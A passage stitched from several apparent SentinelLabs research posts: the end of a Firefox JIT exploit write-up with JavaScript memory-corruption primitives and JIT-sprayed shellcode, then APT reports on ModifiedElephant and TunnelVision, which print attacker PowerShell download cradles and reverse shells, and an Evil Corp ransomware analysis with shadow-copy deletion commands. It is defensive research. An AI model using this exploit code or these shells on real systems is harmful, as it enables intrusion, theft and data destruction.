   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation

The next step is to allocate an ArrayBuffer and find its location:

   main - Performs the exploit
function main() {
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

   main - Performs the exploit
function main() {
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i 

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

   write - Write a value to an address
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

   addrof - Gets the address of a given object
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
   return (BigInt(fake_arrbuf[1] & 0xffff) 

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

   shellcode - Constant values which hold our shellcode to pop xcalc.
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
   main - Performs the exploit
function main() {
   for(i = 0;i 

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon!

— maxpl0it (@maxpl0it) February 1, 2022


Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives were found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

ModifiedElephant APT and a Decade of Fabricating Evidence

By: Tom Hegel
10 February 2022 at 04:55

Executive Summary

  • Our research attributes a decade of activity to a threat actor we call ModifiedElephant.
  • ModifiedElephant is responsible for targeted attacks on human rights activists, human rights defenders, academics, and lawyers across India with the objective of planting incriminating digital evidence.
  • ModifiedElephant has been operating since at least 2012, and has repeatedly targeted specific individuals.
  • ModifiedElephant operates through the use of commercially available remote access trojans (RATs) and has potential ties to the commercial surveillance industry.
  • The threat actor uses spearphishing with malicious documents to deliver malware, such as NetWire, DarkComet, and simple keyloggers with infrastructure overlaps that allow us to connect long periods of previously unattributed malicious activity.

Read the Full Report


In September 2021, SentinelLabs published research into the operations of a Turkish-nexus threat actor we called EGoManiac, drawing attention to their practice of planting incriminating evidence on the systems of journalists to justify arrests by the Turkish National Police. A threat actor willing to frame and incarcerate vulnerable opponents is a critically underreported dimension of the cyber threat landscape that brings up uncomfortable questions about the integrity of devices introduced as evidence. Emerging details in an unrelated case caught our attention as a potentially similar scenario worthy of more scrutiny.

Long-standing racial and political tensions in India were inflamed on January 1st, 2018 when critics of the government clashed with pro-government supporters near Bhima Koregaon. The event led to subsequent protests, resulting in more violence and at least one death.

In the following months, Maharashtra police linked the cause of the violence to the banned Naxalite-Maoist Communist party of India. On April 17th, 2018, police conducted raids and arrested a number of individuals on terrorism-related charges. The arresting agencies identified incriminating files on the computer systems of defendants, including plans for an alleged assassination attempt against Prime Minister Modi.

Thanks to the public release of digital forensic investigation results by Arsenal Consulting and those referenced below, we can glean rare insights into the integrity of the systems of some defendants and grasp the origin of the incriminating files. It turns out that a compromise of defendant systems led to the planting of files that were later used as evidence of terrorism and justification for the defendants’ imprisonment. The intrusions in question were not isolated incidents.

Our research into these intrusions revealed a decade of persistent malicious activity targeting specific groups and individuals that we now attribute to a previously unknown threat actor named ModifiedElephant. This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting. ModifiedElephant is still active at the time of writing.

ModifiedElephant Targets & Objectives

The objective of ModifiedElephant is long-term surveillance that at times concludes with the delivery of ‘evidence’—files that incriminate the target in specific crimes—prior to conveniently coordinated arrests.

After careful review of the attackers’ campaigns over the last decade, we have identified hundreds of groups and individuals targeted by ModifiedElephant phishing campaigns. Activists, human rights defenders, journalists, academics, and law professionals in India are those most highly targeted. Notable targets include individuals associated with the Bhima Koregaon case.

Infection Attempts

Throughout the last decade, ModifiedElephant operators sought to infect their targets via spearphishing emails with malicious file attachments, with their techniques evolving over time.

Their primary delivery mechanism is malicious Microsoft Office document files weaponized to deliver the malware of choice at the time. The specific payloads changed over the years and across different targets. However, some notable trends remain.

  • In mid-2013, the actor used phishing emails containing executable file attachments with fake double extensions (filename.pdf.exe).
  • After 2015, the actor moved on to less obvious files containing publicly available exploits, such as .doc, .pps, .docx, .rar, and password protected .rar files. These attempts involved legitimate lure documents in .pdf, .docx, and .mht formats to captivate the target’s attention while also executing malware.
  • In 2019 phishing campaigns, ModifiedElephant operators also took the approach of providing links to files hosted externally for manual download and execution by the target.
  • As first publicly noted by Amnesty in reference to a subset of this activity, the attacker also made use of large .rar archives (up to 300MB), potentially in an attempt to bypass detection.

Observed lure documents repeatedly made use of CVE-2012-0158, CVE-2014-1761, CVE-2013-3906, CVE-2015-1641 exploits to drop and execute their malware of choice.

The spearphishing emails and lure attachments are titled and generally themed around topics relevant to the target, such as activism news and groups, global and local events on climate change, politics, and public service. A public deconstruction of two seperate 2014 phishing emails was shared by Arsenal Consulting in early 2021.

Spearphishing email containing malicious attachment attributed to ModifiedElephant

ModifiedElephant continually made use of free email service providers, like Gmail and Yahoo, to conduct their campaigns. The phishing emails take many approaches to gain the appearance of legitimacy. This includes fake body content with a forwarding history containing long lists of recipients, original email recipient lists with many seemingly fake accounts, or simply resending their malware multiple times using new emails or lure documents. Notably, in specific attacks, the actor would be particularly persistent and attempt to compromise the same individuals multiple times in a single day.

By reviewing a timeline of attacker activity, we can observe clear trends as the attacker(s) rotate infrastructure over the years.

Timeline sample of ModifiedElephant and SideWinder C2 Infrastructure

For example, from early-2013 to mid-2016, a reasonably clear timeline can be built with little overlap, indicating a potential evolution or expansion of activities. Dates are based on first and last spearphishing emails observed delivering samples that communicate with a given domain. Notably, a separate Indian-nexus threat actor, SideWinder, is placed alongside ModifiedElephant in this graph as they were observed targeting the same individuals.

Weapons of Choice

The malware most used by ModifiedElephant is unsophisticated and downright mundane, and yet it has proven sufficient for their objectives–obtaining remote access and unrestricted control of victim machines. The primary malware families deployed were NetWire and DarkComet remote access trojans (RATs). Both of these RATs are publicly available, and have a long history of abuse by threat actors across the spectrum of skill and capability.

One particular activity revolves around the file Ltr_1804_to_cc.pdf, which contains details of an assassination plot against Prime Minister Modi. A forensic report by Arsenal Consulting showed that this file, one of the more incriminating pieces of evidence obtained by the police, was one of many files delivered via a NetWire RAT remote session that we associate with ModifiedElephant. Further analysis showed how ModifiedElephant was performing nearly identical evidence creation and organization across multiple unrelated victim systems within roughly fifteen minutes of each other.

Incubator Keylogger

Known victims have also been targeted with keylogger payloads stretching as far back as 2012 (0a3d635eb11e78e6397a32c99dc0fd5a). These keyloggers, packed at delivery, are written in Visual Basic and are not the least bit technically impressive. Moreover, they’re built in such a brittle fashion that they no longer function.

The overall structure of the keylogger is fairly similar to code openly shared on Italian hacking forums in 2012. Further details of the ModifiedElephant variant can be found in our full report.

In some cases, the attacker conducted multiple unique phishing attempts with the same payloads across one or more targets. However, ModifiedElephant generally conducts each infection attempt with new malware samples.

Android Trojan

ModifiedElephant also sent multiple phishing emails containing both NetWire and Android malware payloads at the same time. The Android malware is an unidentified commodity trojan delivered as an APK file (0330921c85d582deb2b77a4dc53c78b3).

While the Android trojan bears marks of being designed for broader cybercrime, its delivery at the same time as ModifiedElephant Netwire samples indicates that the same attacker was attempting to get full coverage of the target on both endpoint and mobile. The full report contains further details about the Android Trojan.

Relations to Other Threat Clusters

Our research into this threat actor reveals multiple interesting threads that highlight the complex nature of targeted surveillance and tasking, where multiple actors swoop in with diverse mechanisms to track the same group of individuals. These include private sector offensive actors (PSOAs) and groups with possible commercial facades to coordinate their illicit activities.

Based on our analysis of ModifiedElephant, the group operates in an overcrowded target space and may have relations with other regional threat actors. From our visibility, we can’t further disambiguate the shape of that relationship–whether as part of an active umbrella organization, cooperation and sharing of technical resources and targets across threat groups, or simply coincidental overlaps. Some interesting overlaps are detailed below.

  • Multiple individuals targeted by ModifiedElephant over the years have also been either targeted or confirmed infected with mobile surveillance spyware. Amnesty International identified NSO Group’s Pegasus being used in targeted attacks in 2019 against human rights defenders related to the Bhima Koregaon case. Additionally, the Bhima Koregaon case defendant Rona Wilson’s iPhone was targeted with Pegasus since 2017 based on a digital forensics analysis of an iTunes backup found in the forensic disk images analyzed by Arsenal Consulting.
  • Between February 2013 and January 2014 one target, Rona Wilson, received phishing emails that can be attributed to the SideWinder threat actor. The relationship between ModifiedElephant and SideWinder is unclear as only the timing and targets of their phishing emails overlap within our dataset. This could suggest that the attackers are being provided with similar tasking by a controlling entity, or that they work in concert somehow. SideWinder is a threat actor targeting government, military, and business entities primarily throughout Asia.
  • ModifiedElephant phishing email payloads (b822d8162dd540f29c0d8af28847246e) share infrastructure overlaps (new-agency[.]us) with Operation Hangover. Operation Hangover includes surveillance efforts against targets of interest to Indian national security, both foreign and domestic, in addition to industrial espionage efforts against organizations around the world.
  • Another curious finding is the inclusion of the string “Logs from Moosa’s” found in a keylogger sample closely associated with ModifiedElephant activity in 2012 (c14e101c055c9cb549c75e90d0a99c0a). The string could be a reference to Moosa Abd-Ali Ali, the Bahrain activist targeted around the same time, with FinFisher spyware. Without greater information, we treat this as a low confidence conjecture in need of greater research.


Attributing an attacker like ModifiedElephant is an interesting challenge. At this time, we possess significant evidence of what the attacker has done over the past decade, a unique look into who they’ve targeted, and a strong understanding of their technical objectives.

We observe that ModifiedElephant activity aligns sharply with Indian state interests and that there is an observable correlation between ModifiedElephant attacks and the arrests of individuals in controversial, politically-charged cases.


The Bhima Koregaon case has offered a revealing perspective into the world of a threat actor willing to place significant time and resources into seeking the disruption of those with opposing views. Our profile of ModifiedElephant has taken a look at a small subset of the total list of potential targets, the attackers techniques, and a rare glimpse into their objectives. Many questions about this threat actor and their operations remain; however, one thing is clear: Critics of authoritarian governments around the world must carefully understand the technical capabilities of those who would seek to silence them.

Further details, Indicators of Compromise and Technical References are available in the full report.

Read the Full Report

Log4j2 In The Wild | Iranian-Aligned Threat Actor “TunnelVision” Actively Exploiting VMware Horizon

17 February 2022 at 17:11

By Amitai Ben Shushan Ehrlich and Yair Rigevsky

Executive Summary

  • SentinelLabs has been tracking the activity of an Iranian-aligned threat actor operating in the Middle-East and the US.
  • Due to the threat actor’s heavy reliance on tunneling tools, as well as the unique way it chooses to widely deploy those, we track this cluster of activity as TunnelVision.
  • Much like other Iranian threat actors operating in the region lately, TunnelVision’s activities were linked to deployment of ransomware, making the group a potentially destructive actor.


TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell) and recently Log4Shell. In almost all of those cases, the threat actor deployed a tunneling tool wrapped in a unique fashion. The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink.

TunnelVision activities are correlated to some extent with parts of Microsoft’s Phosphorus, as discussed further in the Attribution section.

In this post, we highlight some of the activities we recently observed from TunnelVision operators, focusing around exploitation of VMware Horizon Log4j vulnerabilities.

VMware Horizon Exploitation

The exploitation of Log4j in VMware Horizon is characterized by a malicious process spawned from the Tomcat service of the VMware product (C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe).

TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement.

Typically, the threat actor initially exploits the Log4j vulnerability to run PowerShell commands directly, and then runs further commands by means of PS reverse shells, executed via the Tomcat process.

PowerShell Commands

TunnelVision operators exploited the Log4j vulnerability in VMware Horizon to run PowerShell commands, sending outputs back utilizing a webhook. In this example, the threat actor attempted to download ngrok to a compromised VMware Horizon server:

    (New-Object System.Net.WebClient).DownloadFile("hxxp://","C:\\Users\Public\public.exe");
    Rename-Item 'c://Users//public//new.txt' 'microsoft.exe';
    $a=iex 'dir "c://Users//public//"' | Out-String;
    iwr -method post -body $a{RANDOM-GUID} -UseBasicParsing;
    iwr -method post -body $Error[0]{RANDOM-GUID} -UseBasicParsing;

Throughout the activity the usage of multiple legitimate services was observed. Given an environment is compromised by TunnelVision, it might be helpful to look for outbound connections to any of those legitimate public services:


Reverse Shell #1

$c = ""
$p = ""
$r = ""
$u = "hxxps://"
$wc = New-Object System.Net.WebClient
$li = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0];
$c = "whoami"
$c = 'Write-Host " ";'+$c
$r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li"
$ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li")
    $c = $wc.DownloadString("$u/$env:COMPUTERNAME-$li/123.txt")
    $c = 'Write-Host " ";'+$c
    if($c -ne $p)
        $r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li"
        $p = $c
        $ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li")
    sleep 3

Reverse Shell #1 was used in the past by TunnelVision operators (7feb4d36a33f43d7a1bb254e425ccd458d3ea921), utilizing a different C2 server: “hxxp://”. This C2 was referenced in several articles analyzing TunnelVision activities.

Throughout the activity the threat actor leveraged another domain, service-management[.]tk, used to host malicious payloads. According to VirusTotal, this domain was also used to host a zip file (d28e07d2722f771bd31c9ff90b9c64d4a188435a) containing a custom backdoor (624278ed3019a42131a3a3f6e0e2aac8d8c8b438).

The backdoor drops an additional executable file (e76e9237c49e7598f2b3f94a2b52b01002f8e862) to %ProgramData%\Installed Packages\InteropServices.exe and registers it as a service named “InteropServices”.

The dropped executable contains an obfuscated version of the reverse shell as described above, beaconing to the same C2 server (www[.]microsoft-updateserver[.]cf). Although it is not encrypted, it is deobfuscated and executed in a somewhat similar manner to how PowerLess, another backdoor used by the group, executes its PowerShell payload.

Reverse Shell #2

$hst = "";
$prt = 443;
function watcher() {;
    $limit = (Get - Random  - Minimum 3  - Maximum 7);
    $stopWatch = New - Object  - TypeName System.Diagnostics.Stopwatch;
    $timeSpan = New - TimeSpan  - Seconds $limit;
    while ((($stopWatch.Elapsed).TotalSeconds  - lt $timeSpan.TotalSeconds) )  {};
$arr = New - Object int[] 500;
for ($i = 0;
$i  - lt 99;
$i++) {;
    $arr[$i] = (Get - Random  - Minimum 1  - Maximum 25);
if ($arr[0]  - gt 0)  {;
    $valksdhfg = New - Object System.Net.Sockets.TCPClient($hst, $prt);
    $banljsdfn = $valksdhfg.GetStream();
    [byte[]]$bytes = 0..65535|% {
    while (($i = $banljsdfn.Read($bytes, 0, $bytes.Length))  - ne 0)  {;
        $lkjnsdffaa = (New - Object  - TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
        $nsdfgsahjxx = (&(gcm('*ke-exp*')) $lkjnsdffaa 2 > &1 | Out - String );
        $nsdfgsahjxx2 = $nsdfgsahjxx  +  (pwd).Path  +  "> ";
        $sendbyte = ([text.encoding]::ASCII).GetBytes($nsdfgsahjxx2);
        $banljsdfn.Write($sendbyte, 0, $sendbyte.Length);

Most of the “online” activities we observed were performed from this PowerShell backdoor. It seems to be a modified variant of a publicly available PowerShell one-liner.

Among those activities were:

  • Execution of recon commands.
  • Creation of a backdoor user and adding it to the administrators group.
  • Credential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.
  • Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
  • Execution of a reverse shell utilizing VMware Horizon NodeJS component[1,2].
  • Internal subnet RDP scan using a publicly available port scan script.

Throughout the activity, the threat actor utilized a github repository “VmWareHorizon” of an account owned by the threat actor, using the name “protections20”.


TunnelVision activities have been discussed previously and are tracked by other vendors under a variety of names, such as Phosphorus (Microsoft) and, confusingly, either Charming Kitten or Nemesis Kitten (CrowdStrike).

This confusion arises since activity that Microsoft recognizes as a single group, “Phosphorous”, overlaps with activity that CrowdStrike distinguishes as belonging to two different actors, Charming Kitten and Nemesis Kitten.

We track this cluster separately under the name “TunnelVision”. This does not imply we believe they are necessarily unrelated, only that there is at present insufficient data to treat them as identical to any of the aforementioned attributions.

Indicators of Compromise

Domain www[.]microsoft-updateserver[.]cf Command and Control (C2) Server
Domain www[.]service-management[.]tk Payload server
IP 51.89.169[.]198 Command and Control (C2) Server
IP 142.44.251[.]77 Command and Control (C2) Server
IP 51.89.135[.]142 Command and Control (C2) Server
IP 51.89.190[.]128 Command and Control (C2) Server
IP 51.89.178[.]210 Command and Control (C2) Server, Tunneling Server
IP 142.44.135[.]86 Tunneling Server
IP 182.54.217[.]2 Payload Server
Github Account Account utilized to host payloads

Sanctions Be Damned | From Dridex to Macaw, The Evolution of Evil Corp

23 February 2022 at 17:46

By Antonio Pirozzi, Antonis Terefos and Idan Weizman

Executive Summary

  • Since OFAC sanctions in 2020, the global intelligence community has been split into different camps as to how Evil Corp is operating.
  • SentinelLabs assesses with high confidence that WastedLocker, Hades, Phoenix Locker, PayloadBIN belong to the same cluster. There are strong overlaps in terms of code similarities, packers, TTPs and configurations.
  • SentinelLabs assesses with high confidence that the Macaw ransomware variant is derived from the same codebase as Hades.
  • Our analysis indicates that Evil Corp became a customer of the CryptOne packer-as-a-service from March 2020. We created a static unpacker, de-CryptOne for CryptOne and identified different versions of this cryptor which have never previously been reported.

Read the Full Report


Evil Corp (EC) is an advanced cybercrime operations cluster originating from Russia that has been active since 2007. The UK National Crime Agency called it “the world’s most harmful cyber crime group.” In December 2019, the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) issued a sanction against 17 individuals and seven entities related to EC cyber operations for causing financial losses of more than 100 million dollars with Dridex.

After the indictments, the global intelligence community was split into different camps as to how Evil Corp was operating. Some assessed that there was a voluntary transition of EC operations to another ‘trusted’ partner while the core group remained the controller of operations. Some had theories that Evil Corp had stopped operating and that another advanced actor operated Hades, trying to mimic the same modus operandi as Evil Corp to mislead attribution. Others claimed possible attribution to the HAFNIUM activity cluster.

SentinelLabs has conducted an in-depth review and technical analysis of Evil Corp activity, malware and TTPs. Our full report has a number of important findings for the research community. We relied heavily on our analysis of a crypter tool dubbed “CryptOne”, which supports our wider clustering of Evil Corp activity. Our research also argues that the original operators continue to be active despite the sanctions, continuously changing their TTPs in order to stay under the radar.

In this post, we summarize some key observations from our technical analysis on the evolution of Evil Corp from Dridex through to Macaw Locker and, for the first time, publicly describe CryptOne and the role it plays in Evil Corp malware development. For the full technical analysis, comprehensive IOCs and YARA hunting rules, please see the full report.

Overview of Recent Evil Corp Activity

After the OFAC indictment, we witnessed a change in Evil Corp TTPs: from 2020, they started to frequently change their payload signatures, using different exploitation tools and methods of initial access. They switched from Dridex to the SocGholish framework to confuse attribution and distance themselves from both Dridex and Bitpaymer, which fell within the scope of the sanctions. During this period, they started relying more heavily on Cobalt Strike to gain an initial foothold and perform lateral movement, rather than PowerShell Empire.

In May 2020, a new ransomware variant appeared in the wild dubbed WastedLocker. WastedLocker (S0612) employed techniques to obfuscate its code and perform tasks similar to those already seen in BitPaymer and Dridex. Those similarities allowed the threat intelligence community to identify the connections between the malware families.

In December 2020, a new ransomware variant named Hades was first seen in the wild and publicly reported. Hades is a 64-bit compiled version of WastedLocker that displays important code and functionality overlaps. A few months later, in March 2021, a new variant Phoenix Locker appeared in the wild. Our analysis suggests this is a rebranded version of Hades with little to no changes. Later, a new variant named PayloadBIN appeared in the wild, a continuation from Phoenix Locker.

A Unique Cluster: BitPaymer, WastedLocker, Hades, Phoenix Locker, PayloadBIN

From our analysis, we discovered evidence of code overlaps, as well as shared configurations, packers and TTPs leading us to assess with high confidence that Bitpaymer, WastedLocker, Hades, PhoenixLocker and PayloadBIN share a common codebase. Our full report goes into the evidence in fine detail. The following section presents a brief summary.

From BitPaymer to WastedLocker

Previous research shows a sort of knowledge reuse between BitPaymer and WastedLocker. SentinelLabs analysis shows that Hades and WastedLocker share the same codebase.

Among other similarities, detailed in the full report, we observe that the RSA functions – responsible for asymmetrically encrypting the keys which were used in the AES phase to encrypt files – are identical in both ransomware variants, hinting that the same utility library was used.

From WastedLocker to Hades

Previous research assessed the main similarities and differences between the two ransomware families. SentinelLabs analysis shows that Hades and WestedLocker share the same codebase.

Again we see the same RSA functions in both families. Both also implement file and directory enumeration logic identically. Comparing the logic and the Control Flow Graph of both routines, we conclude that both ransomware use the same code for file and directory enumeration. We also found similarities between the functions responsible for drive enumeration.

From Hades to Phoenix Locker

In the samples we analyzed, we discovered that Phoenix Locker was a reused and newly-packed Hades payload. Hades and Phoenix samples were compiled at the same time. We confirmed that they reused a ‘clean’ Hades version each time, statically introducing junk code with the help of a script in order to alter the signature. The compiler and linker versions are also the same. This technique of payload reuse was also seen in BitPaymer in order to make the ransomware polymorphic and more evasive.

From Phoenix Locker to PayloadBIN

We observed that the majority of PayloadBIN functions overlap with PhoenixLocker. File enumerating functions are practically identical.

We conducted further similarity analysis by analyzing the TTPs of the different variants. We did this by extracting the main command lines from all the ransomwares and comparing them. We distinguished two distinct clusters.

From Hades onwards, we found a unique self-delete implementation including the waitfor command.

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\CenterLibrary\Tip" & del "C:\Users\Admin\AppData\Roaming\CenterLibrary\Tip" & rd "C:\Users\Admin\AppData\Roaming\CenterLibrary\"

This command is not present in WastedLocker, where the choice command is used instead:

cmd /c choice /t 10 /d y & attrib -h "C:\Users\Admin\AppData\Roaming\Wmi" & del "C:\Users\Admin\AppData\Roaming\Wmi"

Whilst syntax difference may seem like a significant difference, these two implementations are very similar: the logic is the same, only the signature changes.

All ransomwares have the same implementation of Shadows copy deletion:

C:\Windows\system32\vssadmin.exe Delete Shadows /All /Quiet

The evidence of this code reuse supports the assessment that it is almost certain these ransomware families are related to the same ‘factory’.

Analysis of the Cypherpunk Variant

A new, possibly experimental, variant dubbed “Cypherpunk” – first reported in June 2021- was analyzed and linked to the same lineage.

C:\Users\Lucas\Documents\OneNote Notebooks\Personal\
C:\Users\Lucas\Documents\OneNote Notebooks\Personal\CONTACT-TO-DECRYPT.txt
C:\Users\Lucas\Desktop\th (2).jpg.cypherpunk

Code similarity analysis shows that the Cypherpunk version (SHA1 e8d485259e64fd375e03844c03775eda40862e1c) is the same as the previous PayloadBIN variant. It was compiled on 2021-04-01 17:15:24, 20 days after the PayLoadBIN sample. It is possible that this is another attempt at rebranding. Although this variant was reported, it was improperly flagged as Hades.

SentinelLabs assesses this new finding is likely an indication that Evil Corp is still working on updating their tradecraft in order to change their signature and stay under the radar.

Evil Corp Pivots to Macaw Locker Ransomware

In October 2021, a new ransomware variant named ‘Macaw Locker’ appeared in the wild, in an attack that began on October 10th against Olympus. A few days later Sinclair Broadcast Group was also attacked, causing widespread disruption. Some researchers claimed a possible connection with WastedLocker, but to date no further details have emerged.

Macaw ransom note

The ransomware presents anti-analysis features like API hashing and indirect API calls with the intention of evading analysis. One aspect that immediately sets Macaw apart is that it requires a custom token, provided from the command line, which appears to be specific to each victim; without it, the ransomware won’t execute.

macaw_sample.exe -k 

The use of a custom token is also seen in Egregor and BlackCat ransomware families, and is a technique used to aid anti-analysis (T1497.002).

Another new addition to Macaw is a special function that acquires the imports for APIs at runtime, instead of when the executable is started via the PE import section. Below, we can see the function that is used before each API call to get its address prior to the call itself.

Macaw function to dynamically fetch addresses

The function gets a 32-bit value that uniquely represents the required API and searches for it through a data structure created beforehand. The data structure can be described as an array with small binary search trees in each of its entries.

We assessed the similarity of two core functions between Hades and Macaw. In both strains, the implementation is the same. The only minor differences are from the imports fetched at runtime.

CryptOne: One Packer To Rule Them All

CryptOne (also known as HellowinPacker) was a special packer used by Evil Corp up until mid-2021.

CryptOne appears to have first been noticed in 2015. Early versions were used by an assortment of different malware families such as NetWalker, Gozi, Dridex, Hancitor and Zloader. In 2019, Bromium analyzed and reported it as in use by Emotet. In June 2020, NCC Group reported that CryptOne was used to pack WastedLocker. In 2021, researchers observed CryptOne being advertised as a Packer-as-a-Service on various crime-oriented forums.

CryptOne has the following characteristics and features:

  • Sandbox evasion with getInputState() or GetKeyState() API;
  • Anti-emulation with UCOMIEnumConnections and the IActiveScriptParseProcedure32 interface;
  • Code-flow obfuscation;

We created a static unpacker, de-CryptOne, which unpacks both x86 and x64 samples. It outputs two files:

  1. the shellcode responsible for unpacking
  2. the unpacked sample.

We collected CryptOne packed samples, and with the use of the above tool, unpacked and categorized them at scale.

Unpacking CryptOne

CryptOne unpacking method consists of two stages:

  1. Decrypts and executes embedded shellcode.
  2. Shellcode decrypts and executes embedded executables.

CryptOne gets chunks of the encrypted data, which are separated by junk.

CryptOne junk data

Example Memory Dump:

  • 0x5EE00, Encrypted size
  • 0x4011CA, Address of encrypted data
  • 0x4D/”M”, Junk data
  • 0x14, Junk size
  • 0x7A, Chunk Size

After removal of the junk data, the decryption starts with a simple XOR-Key which increases by 0x4 in each round. The initial XOR-Key is 0xA113.

CryptOne XOR Key

Once the shellcode is decrypted, we can partially observe the string “This program cannot be run in DOS mode” where this data contains an executable which requires a second decryption.

CryptOne partially decrypted shellcode

Similar to previous decryption, this time the shellcode decrypts the embedded binary.

Fastcall Shellcode XOR

The shellcode allocates and copies the encrypted executable and starts the decryption loop; once it finishes, it jumps to the EntryPoint and executes the unpacked sample.

CryptOne executing the unpacked sample

At this stage we can observe strings related to the unpacked sample.

CryptOne embedded strings after unpacking

A Unique Factory

Hunting for CryptOne led us to identify different implementations of the stub, some of which have never been reported previously. Each version is identified by a certain signature, listed below:

  • 111111111\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}
  • 1nterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • 444erfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • 555erfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • 5nterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • 987erfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • Interfac4\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • aaaerfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • interfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}
  • rrrerfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}

The first part of the string is composed of a custom string (111111111, 1nterfacE, 444erfacE,…) which is replaced at runtime by the ‘interface’ keyword, creating the following registry key:


The registry keys are related to the UCOMIEnumConnections and IActiveScriptParseProcedure32 interfaces respectively.

Once executed, the cryptor checks for the presence of those keys before loading the next stage payload. If it does not find the keys, then the malware goes into an endless loop without doing anything as an anti-emulation technique. This works because some emulators do not implement the full Windows registry.

In reviewing two different versions of CryptOne:


we noticed that in order to update the signature, the actor needs to re-compile the cryptor as the cryptor implementation changes.

CryptOne Timeline

